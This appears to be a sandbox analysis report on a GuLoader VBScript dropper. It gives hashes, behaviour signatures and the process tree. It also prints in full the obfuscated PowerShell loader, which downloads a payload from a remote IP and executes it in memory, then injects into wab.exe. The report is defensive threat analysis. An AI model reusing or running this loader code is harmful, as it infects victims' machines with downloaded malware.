Analysis
-
max time kernel
146s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
08/05/2024, 07:41
General
-
Target
LPO_6784885.vbs
-
Size
11KB
-
MD5
aa1cdcbb68bc723da0cad23fa773363d
-
SHA1
6d72cde139b62bc48ba0c99219734b54e05cb28f
-
SHA256
7f2e40885256fb1f6d6fdb480723f5e13620380e854514f4b07ff96be44c067d
-
SHA512
026294971daf18f36c0492e479cf19e9b467150c8e77319123ece4f78840f177b7c0f5d4ee4eee0f53965d547dfe6704ea2dc0fa49ae83cef3b5afde2b4a73f0
-
SSDEEP
192:JO7SJ5i0avKua62rhwEPcJUxbh8n6hz5CwOvjVilHesIn9TsYK2Dk7s+JfNFKTsq:YVPKv62jCXB6K9eB3/XUJYC0ExP7hro+
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LPO_6784885.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coleplant4 = 1;$Minifestivals='Su';$Minifestivals+='bstrin';$Minifestivals+='g';Function styrtlbenes($Pladsers){$Parlrers=$Pladsers.Length-$Coleplant4;For($Lejeaftale=2;$Lejeaftale -lt $Parlrers;$Lejeaftale+=3){$Underretningerne219+=$Pladsers.$Minifestivals.Invoke( $Lejeaftale, $Coleplant4);}$Underretningerne219;}function Samaritanskes83($Dept){& ($Tiltalefrafaldenes) ($Dept);}$Typonymic=styrtlbenes 'BaM ToIdzraiAllFolBaaL./ t5Tr.Gl0R. Ty(QuW.ei n udkeoInwinsDe FeNC TDi ge1,d0 E.Ma0Ko;Ta UWP,i Ln ,6Be4Br; N SuxCo6Ba4Im;,a HarMivUn: 1O.2 a1Re.,i0Sp)Dr D G me ocStk VoGo/ H2,y0fr1Tr0Fr0Ud1T.0Hu1 . PFSki SrSkeCif eoa.xbu/S.1 .2I 1Ve.De0 . ';$Tmrervrksteders=styrtlbenes 'BrUtis.ie rDr- rA MgSheFon etBo ';$Sameksisterede=styrtlbenes ' Ah at,atstp F:Es/ D/D,1Te7 ,8Sp.M.2 1In5Un.C 2Na3Sk6So. d2Va2S,9V /ovU SnMasC.eC.vVaeJ rSee .d F. aAlfOpm.i ';$Fllesantennernes=styrtlbenes 'Ex> C ';$Tiltalefrafaldenes=styrtlbenes ' SiF,eGuxCh ';$Moulds='Nonfashionable';Samaritanskes83 (styrtlbenes 'UnS .e,ttin-BoC,eoF.nWit ,e nYotAn K.- IP a Lt ,hSc K.TCo:,a\PoA PeT,r oOpnSpoPsmUdiLsc Qs P. ,tNaxM tVe Is-U VInaTal iuRee.n S$MiMhao.yu ulBrdSesKo;F ');Samaritanskes83 (styrtlbenes 'Usifaf H bi(Prt TeChs tI.- VpreaEnt h B S T.e:Su\SaATreHarUpoPonAro .mVeiLec,us E.Ovtf.xF.tBe),n{D eUnx ni StEv}G,;Mo ');$Naumburgia225 = styrtlbenes ' IeegcTuhRmo M c%AnaUdpBop d aHitP a.r% \ HTW.e HnDoeAccOvtafo .mWiy.l. CD He.opsk Id&.a&Pi meNoc ShSuoM .$Pa ';Samaritanskes83 (styrtlbenes ' B$ g lEaoSubr aTelRu:Y.AS rI bSloSarAsa MrSly.v=Un(,ncMim Odov Mi/MecSp P.$InN a tu Rm,ibO u RrTigSeibraNo2 B2 M5 T)Sk ');Samaritanskes83 (styrtlbenes 'T,$ SgStlVeoSkb abulSi: T neBroDekFor .aN tgee irUnnP e lsBo=P $ kS naSpmFleGekUds ,i Vs.at ,eZ,rChe pdcoeKr.Chs SpdilB.igatph(Ha$,eFR lKalUneTrsAmaMunbot.ke Pn,yn TeUnr.dn qeOusOp),o ');$Sameksisterede=$Teokraternes[0];Samaritanskes83 (styrtlbenes 'ba$S.gS.l OoAnbAga alTi: ,KTiiRel UdP e aShnR,gUniF.vGletalS,sSoe Hn.i=LiNF,eTyw ,-SaOHebL,jJueF,c.ft EmS SyFes .t Be ,mIn.L.NLaeDit A.B WM eH.b eCO.lPui.aeA,nDotC. ');Samaritanskes83 (styrtlbenes 'Ko$AuK KiUrlRedSke.aaF,nWigf.i ,v Ae Cl,as.aeIrnTa.QuHPoeFaaLidIneUnr ,sPh[Ti$GuT.rmTer.ieMerCov Zrr,kInsFitS e Pd.oeKorMisH,] a=S $FrTFryEnpFro,enA.yFlm ViBrc P ');$Privatdetektiv=styrtlbenes 'F,K Si Al od e,eaFrn CgRiiO vSueUrl .sTieg,nP . .D BoAiw.pn lBood.a odDuF piN,lSpe B( .$,eS Ga,am eAnkFos JiEksUptByeS.rSte,ld.re,h,,a$ HP eeK n iSosfo)B, ';$Privatdetektiv=$Arborary[1]+$Privatdetektiv;$Penis=$Arborary[0];Samaritanskes83 (styrtlbenes 'Ju$GigOmlStosebKoaGllKr:E.Fs,aT.t,osFdtjeoLecTmk esel=,t(HuT PeD sAltAa- KP,iaFlt DhOv El$CaPU.eLinLoiMosFa)Sv ');while (!$Fatstocks) {Samaritanskes83 (styrtlbenes ' o$Ofg.ul .oErbOpaSelJe: nSS kSpoFogSkr,eeS dSuephs P=Ov$ ftS.rBru ae.c ') ;Samaritanskes83 $Privatdetektiv;Samaritanskes83 (styrtlbenes 'RoSPst ,aRer.it O-prSF lkoe ,eAfpL Nu4.o ');Samaritanskes83 (styrtlbenes ' R$Klg kl,eoDib aT la,:ToFZoa StOms Gt LoC cVak VsLi=.o( STKueIrsLotGa-MePFoa Mt .hPa e$SaP GeChn Ii.ps,u) I ') ;Samaritanskes83 (styrtlbenes ' O$O.g GlS.or.b SaadlPa:MiRSvvPrrRodIli kg .e,rrKreEnsU.=.n$ BgOmlHao SbImaO l j:HyAHykBit Di,uvPesBut VoB,fgumF nCagPad,eeAf+Wa+Ig%,e$ .TJie.oo Ck Or Fa etOfeAcr GnOueM.sB,.L.cQuoT uKonS,t M ') ;$Sameksisterede=$Teokraternes[$Rvrdigeres];}$Ritualmordet=324416;$Stret=27937;Samaritanskes83 (styrtlbenes 'De$hagMel Go ubU.a MlFo: KAba Us suneGlrGeo NlT.lUne .rKrs C T,=Pa CoGafeSptMe-NtCPhoBen et FeT n ntNa Se$ iPb.e,onNaiSus a ');Samaritanskes83 (styrtlbenes 'Cl$Trg UlIno bS,aDilBe:F B,xrTua lc lh,iySpcOcoHvm HeMo D= R R[ S,lyGusP,tf.eI.mT,.feCProStnU vMeeGurMitIn]To:.n:.eF.frFao rm ,B .asas aeSa6Ca4F.SKrtBer AiunnArgF ( B$ pKPra.ms Gsb ehurUnoOnlrol,ie.ar Ss ,) ');Samaritanskes83 (styrtlbenes ' L$QugRylBlolib .aBllKe:MiFSeos rSmsHagKnerer.t Dr=Po Cu[ SSSjy PsR t eeTam K.MeTAne,lx TtRu.amEKrnPlcKioF,dGuiUnn agN.] S:Se:PrAChSLyC PI nIR,.hiGU eTrtPaSPrt,erAfiTrnUrgTi( K$SgBObr.aaRecAfhV.y,ec oF.mShepa).k ');Samaritanskes83 (styrtlbenes 'pr$TigNel SoLabCiaV,l N:Susm.tScyRhkD,kS eInrPonDie C= A$InF FoMurElsTigPreSerdo.E sGru ,bSks,otOvru i SnGegSa(M,$ cRUni.it PuCeaMul .mLeoBorRod,ueprt ,ce$H.S,at ,rDiePotNa).r ');Samaritanskes83 $stykkerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tenectomy.Dep && echo $"3⤵
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coleplant4 = 1;$Minifestivals='Su';$Minifestivals+='bstrin';$Minifestivals+='g';Function styrtlbenes($Pladsers){$Parlrers=$Pladsers.Length-$Coleplant4;For($Lejeaftale=2;$Lejeaftale -lt $Parlrers;$Lejeaftale+=3){$Underretningerne219+=$Pladsers.$Minifestivals.Invoke( $Lejeaftale, $Coleplant4);}$Underretningerne219;}function Samaritanskes83($Dept){& ($Tiltalefrafaldenes) ($Dept);}$Typonymic=styrtlbenes 'BaM ToIdzraiAllFolBaaL./ t5Tr.Gl0R. Ty(QuW.ei n udkeoInwinsDe FeNC TDi ge1,d0 E.Ma0Ko;Ta UWP,i Ln ,6Be4Br; N SuxCo6Ba4Im;,a HarMivUn: 1O.2 a1Re.,i0Sp)Dr D G me ocStk VoGo/ H2,y0fr1Tr0Fr0Ud1T.0Hu1 . PFSki SrSkeCif eoa.xbu/S.1 .2I 1Ve.De0 . ';$Tmrervrksteders=styrtlbenes 'BrUtis.ie rDr- rA MgSheFon etBo ';$Sameksisterede=styrtlbenes ' Ah at,atstp F:Es/ D/D,1Te7 ,8Sp.M.2 1In5Un.C 2Na3Sk6So. d2Va2S,9V /ovU SnMasC.eC.vVaeJ rSee .d F. aAlfOpm.i ';$Fllesantennernes=styrtlbenes 'Ex> C ';$Tiltalefrafaldenes=styrtlbenes ' SiF,eGuxCh ';$Moulds='Nonfashionable';Samaritanskes83 (styrtlbenes 'UnS .e,ttin-BoC,eoF.nWit ,e nYotAn K.- IP a Lt ,hSc K.TCo:,a\PoA PeT,r oOpnSpoPsmUdiLsc Qs P. ,tNaxM tVe Is-U VInaTal iuRee.n S$MiMhao.yu ulBrdSesKo;F ');Samaritanskes83 (styrtlbenes 'Usifaf H bi(Prt TeChs tI.- VpreaEnt h B S T.e:Su\SaATreHarUpoPonAro .mVeiLec,us E.Ovtf.xF.tBe),n{D eUnx ni StEv}G,;Mo ');$Naumburgia225 = styrtlbenes ' IeegcTuhRmo M c%AnaUdpBop d aHitP a.r% \ HTW.e HnDoeAccOvtafo .mWiy.l. CD He.opsk Id&.a&Pi meNoc ShSuoM .$Pa ';Samaritanskes83 (styrtlbenes ' B$ g lEaoSubr aTelRu:Y.AS rI bSloSarAsa MrSly.v=Un(,ncMim Odov Mi/MecSp P.$InN a tu Rm,ibO u RrTigSeibraNo2 B2 M5 T)Sk ');Samaritanskes83 (styrtlbenes 'T,$ SgStlVeoSkb abulSi: T neBroDekFor .aN tgee irUnnP e lsBo=P $ kS naSpmFleGekUds ,i Vs.at ,eZ,rChe pdcoeKr.Chs SpdilB.igatph(Ha$,eFR lKalUneTrsAmaMunbot.ke Pn,yn TeUnr.dn qeOusOp),o ');$Sameksisterede=$Teokraternes[0];Samaritanskes83 (styrtlbenes 'ba$S.gS.l OoAnbAga alTi: ,KTiiRel UdP e aShnR,gUniF.vGletalS,sSoe Hn.i=LiNF,eTyw ,-SaOHebL,jJueF,c.ft EmS SyFes .t Be ,mIn.L.NLaeDit A.B WM eH.b eCO.lPui.aeA,nDotC. ');Samaritanskes83 (styrtlbenes 'Ko$AuK KiUrlRedSke.aaF,nWigf.i ,v Ae Cl,as.aeIrnTa.QuHPoeFaaLidIneUnr ,sPh[Ti$GuT.rmTer.ieMerCov Zrr,kInsFitS e Pd.oeKorMisH,] a=S $FrTFryEnpFro,enA.yFlm ViBrc P ');$Privatdetektiv=styrtlbenes 'F,K Si Al od e,eaFrn CgRiiO vSueUrl .sTieg,nP . .D BoAiw.pn lBood.a odDuF piN,lSpe B( .$,eS Ga,am eAnkFos JiEksUptByeS.rSte,ld.re,h,,a$ HP eeK n iSosfo)B, ';$Privatdetektiv=$Arborary[1]+$Privatdetektiv;$Penis=$Arborary[0];Samaritanskes83 (styrtlbenes 'Ju$GigOmlStosebKoaGllKr:E.Fs,aT.t,osFdtjeoLecTmk esel=,t(HuT PeD sAltAa- KP,iaFlt DhOv El$CaPU.eLinLoiMosFa)Sv ');while (!$Fatstocks) {Samaritanskes83 (styrtlbenes ' o$Ofg.ul .oErbOpaSelJe: nSS kSpoFogSkr,eeS dSuephs P=Ov$ ftS.rBru ae.c ') ;Samaritanskes83 $Privatdetektiv;Samaritanskes83 (styrtlbenes 'RoSPst ,aRer.it O-prSF lkoe ,eAfpL Nu4.o ');Samaritanskes83 (styrtlbenes ' R$Klg kl,eoDib aT la,:ToFZoa StOms Gt LoC cVak VsLi=.o( STKueIrsLotGa-MePFoa Mt .hPa e$SaP GeChn Ii.ps,u) I ') ;Samaritanskes83 (styrtlbenes ' O$O.g GlS.or.b SaadlPa:MiRSvvPrrRodIli kg .e,rrKreEnsU.=.n$ BgOmlHao SbImaO l j:HyAHykBit Di,uvPesBut VoB,fgumF nCagPad,eeAf+Wa+Ig%,e$ .TJie.oo Ck Or Fa etOfeAcr GnOueM.sB,.L.cQuoT uKonS,t M ') ;$Sameksisterede=$Teokraternes[$Rvrdigeres];}$Ritualmordet=324416;$Stret=27937;Samaritanskes83 (styrtlbenes 'De$hagMel Go ubU.a MlFo: KAba Us suneGlrGeo NlT.lUne .rKrs C T,=Pa CoGafeSptMe-NtCPhoBen et FeT n ntNa Se$ iPb.e,onNaiSus a ');Samaritanskes83 (styrtlbenes 'Cl$Trg UlIno bS,aDilBe:F B,xrTua lc lh,iySpcOcoHvm HeMo D= R R[ S,lyGusP,tf.eI.mT,.feCProStnU vMeeGurMitIn]To:.n:.eF.frFao rm ,B .asas aeSa6Ca4F.SKrtBer AiunnArgF ( B$ pKPra.ms Gsb ehurUnoOnlrol,ie.ar Ss ,) ');Samaritanskes83 (styrtlbenes ' L$QugRylBlolib .aBllKe:MiFSeos rSmsHagKnerer.t Dr=Po Cu[ SSSjy PsR t eeTam K.MeTAne,lx TtRu.amEKrnPlcKioF,dGuiUnn agN.] S:Se:PrAChSLyC PI nIR,.hiGU eTrtPaSPrt,erAfiTrnUrgTi( K$SgBObr.aaRecAfhV.y,ec oF.mShepa).k ');Samaritanskes83 (styrtlbenes 'pr$TigNel SoLabCiaV,l N:Susm.tScyRhkD,kS eInrPonDie C= A$InF FoMurElsTigPreSerdo.E sGru ,bSks,otOvru i SnGegSa(M,$ cRUni.it PuCeaMul .mLeoBorRod,ueprt ,ce$H.S,at ,rDiePotNa).r ');Samaritanskes83 $stykkerne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tenectomy.Dep && echo $"4⤵
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
458KB
MD568b7a63361d93041fa9246b1d609b3bf
SHA108b8fb66b87c5c0513f9b9f576323416c895bfb1
SHA2566ec7bfc6f46580e65955e1260c16d7868db29e9fb7878d1e42306eabf3963c17
SHA512e6e7e53281977e0259d991932c8eba1452b302b6626c2bbb6b427488ce11b9f348c79e8ff9373135f589740ed25619a1a5ca2df469824d08ea22566da3880dc6
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
120KB
-
Filesize
600KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
12.1MB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
12.1MB